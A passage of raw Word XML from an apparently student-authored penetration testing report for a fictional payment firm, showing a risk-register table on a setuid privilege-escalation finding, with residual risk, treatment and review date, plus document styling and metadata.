              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Asset network segmentation; SSH-key-only authentication for the staff account; logging of sudo commands to /var/log/auth.log (review monthly).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="1BFA2334"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E9A32E1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Residual Risk</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6C9E9D01" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>High. Current controls do not detect the abuse path (no real-time alerting on setuid execve); time-to-root is approximately 10 seconds, below the 60-second alert window of the current SIEM rule set.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="378CBFFA"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662554AF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Recommended Treatment</w:t>
            </w:r>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412EB2C3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Mitigate. Implement Recommendations #1 and #6 within 30 days. Re-rate residual risk after implementation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="1BDCA3EC"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2DADAB32" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Risk Owner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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A8D5AAD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>CISO (A. Volkova, Cassandra Pay).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="47D5DC09"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7A895EFC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Next review date</w:t>
            </w:r>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60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="030DE9FA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>13 August 2026 (90 days post-publication of this report).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7267124C" w14:textId="77777777" w:rsidR="008563B8" w:rsidRDefault="008563B8"/>
    <w:sectPr w:rsidR="008563B8">
      <w:headerReference w:type="default" r:id="rId13"/>
      <w:footerReference w:type="default" r:id="rId14"/>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1F31C" w14:textId="77777777" w:rsidR="008563B8" w:rsidRDefault="008563B8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="60857810" w14:textId="77777777" w:rsidR="008563B8" w:rsidRDefault="008563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scadia Code">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3415A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="2" w:space="0" w:color="DDDDDD"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Triton Security Labs  •  TSL-2026-CP-014  •  Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00C23662">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:noProof/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>5</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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F915F" w14:textId="77777777" w:rsidR="008563B8" w:rsidRDefault="008563B8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="47D34273" w14:textId="77777777" w:rsidR="008563B8" w:rsidRDefault="008563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C6BB3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="DDDDDD"/>
      </w:pBdr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Cassandra Pay — Penetration Testing Report v1.0  |  CONFIDENTIAL — TLP:AMBER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696394"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0130EA30"/>
    <w:lvl w:ilvl="0" w:tplc="BB4E5802">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A7389656">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FC0CE610">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="71D69AA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="97A29B94">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="FC6E8A34">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="609A5DF8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="62688B2A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2B5AA3F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1718895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7A4"/>
    <w:rsid w:val="000E57A4"/>
    <w:rsid w:val="008563B8"/>
    <w:rsid w:val="00AB6463"/>
    <w:rsid w:val="00C23662"/>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59DE2B3A"/>
  <w15:docId w15:val="{DC5D4E5B-2A78-3E40-94F8-19FD6CF96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rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2E75B6"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:sz="18" w:space="14" w:color="2E75B6"/>
      </w:pBdr>
      <w:spacing w:before="240" w:after="80"/>
      <w:ind w:left="160"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2E75B6"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="180" w:after="60"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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23662"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C23662"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="400"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C2366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7105</Words>
  <Characters>40504</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>337</Lines>
  <Paragraphs>95</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>47514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Cassandra Pay — Penetration Testing Report v1.0</dc:title>
  <dc:creator>Dmytro Bilozor</dc:creator>
  <dc:description>EGR6301 Ethical Hacking Lab 10 — Final PTES Report</dc:description>
  <cp:lastModifiedBy>Dima Bil</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-17T07:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-17T07:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>